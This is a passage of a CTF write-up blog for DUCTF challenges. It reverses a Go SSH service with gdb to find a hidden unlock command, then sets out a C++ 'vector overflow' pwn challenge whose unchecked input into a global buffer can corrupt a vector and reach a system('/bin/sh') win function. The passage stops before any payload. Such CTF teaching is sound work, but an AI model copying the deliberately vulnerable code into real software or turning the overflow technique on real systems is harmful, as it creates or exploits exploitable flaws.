12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Investigating what happens after login</h3>\n<p>When I log in to this app over SSH, after <code class=\"language-text\">Welcome &lt;USER></code> it shows the following line: <code class=\"language-text\">This is the Kookaburra holding cells. Contained: 11912 Kookaburras\n        -> No valid command</code>.</p>\n<p>From this, I could tell that I would probably get the flag by executing some valid command over SSH.</p>\n<p>It appears that the Wish library handles SSH commands with a function called <code class=\"language-text\">Command</code>.</p>\n<p>Reference: <a href=\"https://github.com/charmbracelet/wish/blob/4f1d502c6a084e95b0065dbacdba94fbc295c992/cmd.go#L27\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">wish/cmd.go at 4f1d502c6a084e95b0065dbacdba94fbc295c992 · charmbracelet/wish</a></p>\n<p>As a quick test, I searched the symbol tree for the text <code class=\"language-text\">Command</code>, and found the function <code class=\"language-text\">github.com/charmbracelet/ssh.(*session).Command</code>.</p>\n<p>That looked like the function handling commands received over SSH.</p>\n<p>When I set a breakpoint there and ran it, I confirmed that it really does process the received command inside this function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0921cc74ebd87a9a622e8f735d44aa08/b5dee/image-20240710214046961.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABo0lEQVQoz6VS2W7bMBAUL4mkeOiyDku1LMu10+T/v2+yYgIULRAEaB8G3KW0szs7zGwcIW2F0gfEqoZ1AcpEcKXBuAQTiiB/x1wgy7KvEesBGRNQSsFoAym/KfgOVbvCxAEuerhTBU9TxrqBDS1ybT9gI2SuYYyBEAKcc3DB03nk4jNmjCGrlYF3HqGKCDXJrivUdQ0fIiHAeZ9WofIcWhew1tKdg3MOpSvpH5/yIz5UZiHWf4zM/kdu2mF3gdCROgYyhuRWHU2i6SP7N8KuH2E8jVsK5E5DlmSOLyhWcIqjIoeV4ZCa0ckgkmks7Svt7G/CX2+v2PYN2/2G+2PH/XnH5bZhvV2x7ze8PB64XFdwKcmoEiWZ5ytPZiloW0AVx3PKyCQiZ0S4bRum8xnLjwUrFV4J0zRhns+YlxnrtmKcxtRda44QJBknoR1LsJFTI06qSEVOpC/PBT/3ActykMx0zhiGHsM4EPFIjeYUH4Sl5GiMQGM5dJ4l2OIDRyw4Tfj69kTft+iHUyocCW3XoiOc+lPKm7ZJhLa08DHSE/FfmvIO2R/0B0DC1/sAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0921cc74ebd87a9a622e8f735d44aa08/8ac56/image-20240710214046961.webp 240w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/d3be9/image-20240710214046961.webp 480w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/e46b2/image-20240710214046961.webp 960w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/3deba/image-20240710214046961.webp 1237w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0921cc74ebd87a9a622e8f735d44aa08/8ff5a/image-20240710214046961.png 240w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/e85cb/image-20240710214046961.png 480w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/d9199/image-20240710214046961.png 960w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/b5dee/image-20240710214046961.png 1237w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0921cc74ebd87a9a622e8f735d44aa08/d9199/image-20240710214046961.png\"\n            alt=\"image-20240710214046961\"\n            title=\"image-20240710214046961\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Stepping through with gdb showed that this function passes the received command to <code class=\"language-text\">main.RunSSH.MiddlewareWithLogger.func8.1</code>, and during the processing of that function, <code class=\"language-text\">No valid command</code> was printed.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6ef31e4e589bd332c2755f3ae8378746/8de58/image-20240710214133949.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 72.91666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACVUlEQVQ4y5WT2XabMBRFGQUIkBBiBlM7sRMnceOkafv/f3Z6IC/NchqvPtx1QcO505ajTI0gzhGIiD6DH2WIpUKqDKI4gecHcD3/gzmO82+z/YwgtfADQUEFL8oRRRG0yiBl/PXlz0wVI8rhAYVtYMZ7lJtH1N2AaX9CNezQtA1ylcN1XQRhgDiJEYbhGnTxF4ItS0tjyRIVtNbIsiUzCZky02U9TZFQxPd9iEggz9mSOOa+5H50KWjaCY5Q8MMYIsngeAKe60GEbEEQ/H/J9bBB2X9jNAGZaIR5AZknzDhBGLhIeMj3HXihAzeg968IjvOEfhphSo3WGJi6gGksiqaELnL02rBk9ksyoJIkQDKQoIVwHfdS8O3nG273tzg+PODp+YSXlxe8/njF+fyM/WGPw/Fu7dcyjJqBxm2DbqoxbTuk+ScU/Pr9hru7PY68eDo9Uoiir2d8p/jtfse9A9JMQhmJejB4PB9YUYOb+xllpS8Fh3kH221QtR0xmdFMN2jY137YwlQdaq7LNEPIiUoSoEhFTOCTRLK3H4e2oOV08x7ldKTIBC01s6mQ6wI1samKEl3fYRh6tG0La+2K0YJXVVm2oIalT7OUQSIIQS51u0M2PCEvamZZwvDiOG2wmUeCG6yHhBAE+R2jJQvP89a1hcsVcoqt2S2Z5nZEZLaIM0544GTbilkovg6NRKZruZJ++bdVjaIsv+ZzqiS2g2WjC/RjjHkqYcsUiqUUpUWSEvjMJzb++u35V2BvWX+hc74MPq21RF7mdyjey3FdHvrbrryUPyCYUwZNTsbbAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6ef31e4e589bd332c2755f3ae8378746/8ac56/image-20240710214133949.webp 240w,\n/static/6ef31e4e589bd332c2755f3ae8378746/d3be9/image-20240710214133949.webp 480w,\n/static/6ef31e4e589bd332c2755f3ae8378746/e46b2/image-20240710214133949.webp 960w,\n/static/6ef31e4e589bd332c2755f3ae8378746/4fba2/image-20240710214133949.webp 1219w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6ef31e4e589bd332c2755f3ae8378746/8ff5a/image-20240710214133949.png 240w,\n/static/6ef31e4e589bd332c2755f3ae8378746/e85cb/image-20240710214133949.png 480w,\n/static/6ef31e4e589bd332c2755f3ae8378746/d9199/image-20240710214133949.png 960w,\n/static/6ef31e4e589bd332c2755f3ae8378746/8de58/image-20240710214133949.png 1219w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6ef31e4e589bd332c2755f3ae8378746/d9199/image-20240710214133949.png\"\n            alt=\"image-20240710214133949\"\n            title=\"image-20240710214133949\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reading through the code of <code class=\"language-text\">main.RunSSH.MiddlewareWithLogger.func8.1</code> carefully, I found the following branch where the input value is compared against the text <code class=\"language-text\">UnlockTheCells</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/54c3a/image-20240710220108173.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACNElEQVQ4y32SSY/aQBCF+SvJCO+eAbPPDGAbL+29MWZPLolyiyLl/x9eqt0hkGSGw1O1Jeur96qqo+s6lK4CRVGgaRq63S4mz1MkeYogDBEmMTzPw/z1FYv5HHOS4zhQVRWGYUiZJtSHDyi+/kDHtiywjCFJGFiSICtLrIIVDGqkG1JRGiHNUsRRhDCW6vf7rQEJvQXaFipeYs0rZGmGrCgRhpEE6kZb5+4Cnu+TPCzdJRaLBXq9XgszyZ1p2dC6H5F/+Y6OiKwqMrKqXuo1jngvvCWquqIUCUpqnOQZbNu+AumtKw8ov/1E588c/pFoJKqmanievyBOYwRBgIhm6nouLEp2mZ9pibcGtt1Jh2/pArXoZ3flwXVd+CsfPs3XpeiT6UQ6tMxWT04P48nof4cX2FUmvMBDGIWIxEJYBEbLGY2GtDCjbSgc9gd9jF8mfwNvnWk0O/W3vMBH3F4Bo+h0ESyGQ1tWacviCgzTwHA6gv1ov+3QJFdhQk7ShJxFWNHWXX9FNZBzpO84Zu2SGGMUfwr76RHFib8DpEHXpwbHTyfs9gfsTydsDjvUmw3WpKIo6MRSpCTxns1mcEYOafA+kO9rbPcEqWvsjkc0n8/YbBs6G46yaZBX8oyyLMOUHA6mw3aed4HNfgu+pnok2Pks3ZUFCr4mcaQEzLNcAifDOzMUwINwuMW6FuAdqobiCtE3J2BVcfCyAqd6AYrzue9wJyKuwRvpTMQTMW91ieyMB63DX7Fo1CCd5dF8AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/8ac56/image-20240710220108173.webp 240w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/d3be9/image-20240710220108173.webp 480w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/e46b2/image-20240710220108173.webp 960w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/62664/image-20240710220108173.webp 1257w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/8ff5a/image-20240710220108173.png 240w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/e85cb/image-20240710220108173.png 480w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/d9199/image-20240710220108173.png 960w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/54c3a/image-20240710220108173.png 1257w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/d9199/image-20240710220108173.png\"\n            alt=\"image-20240710220108173\"\n            title=\"image-20240710220108173\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I opened an SSH connection that executed this command, and I was able to obtain the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 746px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b442562e63a67da087ea9f66b288e9eb/62de4/image-20240710220403373.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABwklEQVQ4y41T2VLDMAxsm8M5nPsoPRigF9CmB///cYtWbTowQOnDjmI73l1J1sBWHsrHAOXcIB27CK1Bnhdomhp1XaEsC0VsYzRtg6Io5DxHJWetrPMix3A4xGAwOCOMQpiAJBmMMXBGDoIgQBRFiOMYYRhqzLIUvu8reK4IGY3+4zijM6G1Vn/KsgyFOGGsxR1jmqaoqhKpkNEt9wg6pjOe8Q6d08BoJKS9apIkqur5njqmMsWo3jsmfONrJq7r6r/+5X8rJVFCHvASwQ3HcSTFSO1rKcQJibjPWn2r128gkRFVKvMyUQhYN6bO9Jg6m0Khqqr07E9Cz/Ou6fQNYKosAYn4zRRVoD7XliW66ZDKSZqcU3YdJeYlloOR+wTFuXczZRaT9eHboqv+vdERn0Xv+CbJV2i3RJlkSWL1spXIEtjLmo7vJmRd5o9zPD0/4WHygPG4lSlp1PFE1sS/nf2KXbfD8XTA/rDH4bjHYvGicb1Z4+PjhI1EjlgrQm3b6sixWXzsfNQ/CDlSTGs2nypxt++UbNdtZX0UoQ5v76/XbvOR98PA9S+EHKUS09kUq9USq/US291WI52w6zoBd6b8CZuTOd7tSZu3AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b442562e63a67da087ea9f66b288e9eb/8ac56/image-20240710220403373.webp 240w,\n/static/b442562e63a67da087ea9f66b288e9eb/d3be9/image-20240710220403373.webp 480w,\n/static/b442562e63a67da087ea9f66b288e9eb/f7ebd/image-20240710220403373.webp 746w\"\n              sizes=\"(max-width: 746px) 100vw, 746px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b442562e63a67da087ea9f66b288e9eb/8ff5a/image-20240710220403373.png 240w,\n/static/b442562e63a67da087ea9f66b288e9eb/e85cb/image-20240710220403373.png 480w,\n/static/b442562e63a67da087ea9f66b288e9eb/62de4/image-20240710220403373.png 746w\"\n            sizes=\"(max-width: 746px) 100vw, 746px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b442562e63a67da087ea9f66b288e9eb/62de4/image-20240710220403373.png\"\n            alt=\"image-20240710220403373\"\n            title=\"image-20240710220403373\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Analyzing Go binaries was difficult.</p>\n<h2 id=\"vector-overflowpwn\" style=\"position:relative;\"><a href=\"#vector-overflowpwn\" aria-label=\"vector overflowpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>vector overflow(Pwn)</h2>\n<blockquote>\n<p>vector overflow</p>\n</blockquote>\n<p>The challenge provides the binary and the following source code.</p>\n<p>In this binary, the global variables <code class=\"language-text\">buf</code> and <code class=\"language-text\">vector v</code> are defined.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;cstdlib></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;iostream></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;vector></span></span>\n\n<span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">16</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\nstd<span class=\"token operator\">::</span>vector<span class=\"token operator\">&lt;</span><span class=\"token keyword\">char</span><span class=\"token operator\">></span> v <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token char\">'X'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'X'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'X'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'X'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'X'</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">lose</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Bye!\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/bin/sh\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">char</span> ductf<span class=\"token punctuation\">[</span><span class=\"token number\">6</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"DUCTF\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">char</span><span class=\"token operator\">*</span> d <span class=\"token operator\">=</span> ductf<span class=\"token punctuation\">;</span>\n\n    std<span class=\"token operator\">::</span>cin <span class=\"token operator\">>></span> buf<span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span>v<span class=\"token punctuation\">.</span><span class=\"token function\">size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">5</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">for</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">auto</span> <span class=\"token operator\">&amp;</span>c <span class=\"token operator\">:</span> v<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span>c <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span>d<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n                <span class=\"token function\">lose</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n            <span class=\"token punctuation\">}</span>\n        <span class=\"token punctuation\">}</span>\n\n        <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">lose</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>There is of course an obvious vulnerability in <code class=\"language-text\">buf</code>, which receives the input, but the code starting from <code class=\"language-text\">if(v.size() == 5)</code> treats it as a vector object rather than plain text, so if you want to tamper with the value via a buffer overflow, you need to craft the input carefully.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 858px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/936cff7b6f936cfa5d290717e1a444b1/42d54/image-20240706153224836.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 10.833333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVQI10WIQQ6CMBAA+UfZbiEFt6lQjQ8waOBojOH/XxkrFw+TmUyTppmYC25IiHZYPlcHkhVSzHgfcK3Qisf9+LVX/DDiT4bEATU7kK6nKbcPdt2R9EL7lenyRruVMu/k+mLtoE/EL3/0QbANHbfDovW5OyILXyVbOwxCvM54AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/936cff7b6f936cfa5d290717e1a444b1/8ac56/image-20240706153224836.webp 240w,\n/static/936cff7b6f936cfa5d290717e1a444b1/d3be9/image-20240706153224836.webp 480w,\n/static/936cff7b6f936cfa5d290717e1a444b1/41e9e/image-20240706153224836.webp 858w\"\n              sizes=\"(max-width: 858px) 100vw, 858px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/936cff7b6f936cfa5d290717e1a444b1/8ff5a/image-20240706153224836.png 240w,\n/static/936cff7b6f936cfa5d290717e1a444b1/e85cb/image-20240706153224836.png 480w,\n/static/936cff7b6f936cfa5d290717e1a444b1/42d54/image-20240706153224836.png 858w\"\n            sizes=\"(max-width: 858px) 100vw, 858px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/936cff7b6f936cfa5d290717e1a444b1/42d54/image-20240706153224836.png\"\n            alt=\"image-20240706153224836\"\n            title=\"image-20240706153224836\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The vector object stores a pointer to its buffer at the beginning, and its size seems to be calculated from the difference to the next address.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ed46da1b12b3e57f05a7c97482895758/51800/image-20240706153305405.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 72.91666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACRUlEQVQ4y5VU13LbMBBkQy8EexMpuUqyk3dP/v+/NkfKdhyP5UkedkBwgMVibw+RKSykrZBxBSYdMqFhfY6638HmBYzzSFKGOEkJ2TuiKPoa3b5A1XSXSZwSYnDOoKRAlqUbrm7+CnlrkBcztG/hihbahk1hWTeoqhJN28A5B0aHJEmCNE2R0iHr+D5Pkw+EtUbtAlxZoe07OCJbr5oHUl5XCEVA+0qaZRmklLDWQGlFN+HQNCql/hD6QqDxFk3O0A8N7h4fcXd/h8PNAcYYSCVhVgLaFEKAIMKYbFnVvWGdvymOfMUw5Bp902MiZVM3oh6Xzddl2aHvW4ykfKbvsizgc0dq7XaYMVRAa0nlZVwVR7pSKPoerm1RkpLSeugqhyP/8pb8VBxVJqCsQCLIM5lQEtj1oszLjONxveYtxt24LfaFQ1ETWW6hjIB1a+E8RUhD0lxqSVZwcMnABd+UrUVbPY4Ohz3OTyeczifs9zMKUtIECWfJExGDaYqRTsAVwSQQllTyCExd/ifZJ4Ur4fF0xAOpbKmqJolRyRg1bXREJnn8fzlc9gf4ekeeTdQxAdzVMKHEuOzRjwM6KkjTdRBU5YxxyuCla64S3tw/gLkesqKYhAa6nCCKBcx2W/s9PT/j5dcLVXnZosOF+F7h8fxEBDNM9wAbOlTDAc1yRjPdYt4N+PHzecMa7n+6cjdOZHiA9B2Z7jBOA1YbhmmmSmpalLw+DH/jKmE/DNR6hjrAQ1C7CR8oKg6CRfTKfN4Yf8DXhL8Bk9xQTc5P2poAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ed46da1b12b3e57f05a7c97482895758/8ac56/image-20240706153305405.webp 240w,\n/static/ed46da1b12b3e57f05a7c97482895758/d3be9/image-20240706153305405.webp 480w,\n/static/ed46da1b12b3e57f05a7c97482895758/e46b2/image-20240706153305405.webp 960w,\n/static/ed46da1b12b3e57f05a7c97482895758/31d32/image-20240706153305405.webp 1196w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ed46da1b12b3e57f05a7c97482895758/8ff5a/image-20240706153305405.png 240w,\n/static/ed46da1b12b3e57f05a7c97482895758/e85cb/image-20240706153305405.png 480w,\n/static/ed46da1b12b3e57f05a7c97482895758/d9199/image-20240706153305405.png 960w,\n/static/ed46da1b12b3e57f05a7c97482895758/51800/image-20240706153305405.png 1196w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ed46da1b12b3e57f05a7c97482895758/d9199/image-20240706153305405.png\"\n            alt=\"image-20240706153305405\"\n            title=\"image-20240706153305405\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 930px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/340a486a7fdeab7961044e62618bb6c0/416ee/image-20240706153325903.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 32.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABHUlEQVQoz5WRyXbCMAxFPSVxbDIzFTK0QIBQoN31/7/s9YUsuoFFFzpP0pGuJVm01uJ8PGC332G4DFitlvAzjyxP4b2EjQVSLzCjxtGkif/LhcEUe/qOJpL6E2V3R7YZMKtqNG0NG1nGIYqFRG4EAjYpqtSTGjOBAqpS9M3kj3mRbm9I6y8kVF81D6CSCkEuYKXARQjUgmClUTFfaoOAsWD+qY3ArBmB1wdwv/+AczGikkC+eJASPyzstcZgI5xdwlXda2BW35G33xjBft6i5z2dcwgLArnijlNdWVgSvI5ClMZAKvUamGzvSLiyf7vCzd9xPPWIY05Y8RM4YcP14lfNz2zZ9Gj6G9bdCYtNh6LIedwAxgloHlz/B0b7BbKFnNVznoDdAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/340a486a7fdeab7961044e62618bb6c0/8ac56/image-20240706153325903.webp 240w,\n/static/340a486a7fdeab7961044e62618bb6c0/d3be9/image-20240706153325903.webp 480w,\n/static/340a486a7fdeab7961044e62618bb6c0/6eb96/image-20240706153325903.webp 930w\"\n              sizes=\"(max-width: 930px) 100vw, 930px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/340a486a7fdeab7961044e62618bb6c0/8ff5a/image-20240706153325903.png 240w,\n/static/340a486a7fdeab7961044e62618bb6c0/e85cb/image-20240706153325903.png 480w,\n/static/340a486a7fdeab7961044e62618bb6c0/416ee/image-20240706153325903.png 930w\"\n            sizes=\"(max-width: 930px) 100vw, 930px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/340a486a7fdeab7961044e62618bb6c0/416ee/image-20240706153325903.png\"\n            alt=\"image-20240706153325903\"\n            title=\"image-20240706153325903\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n  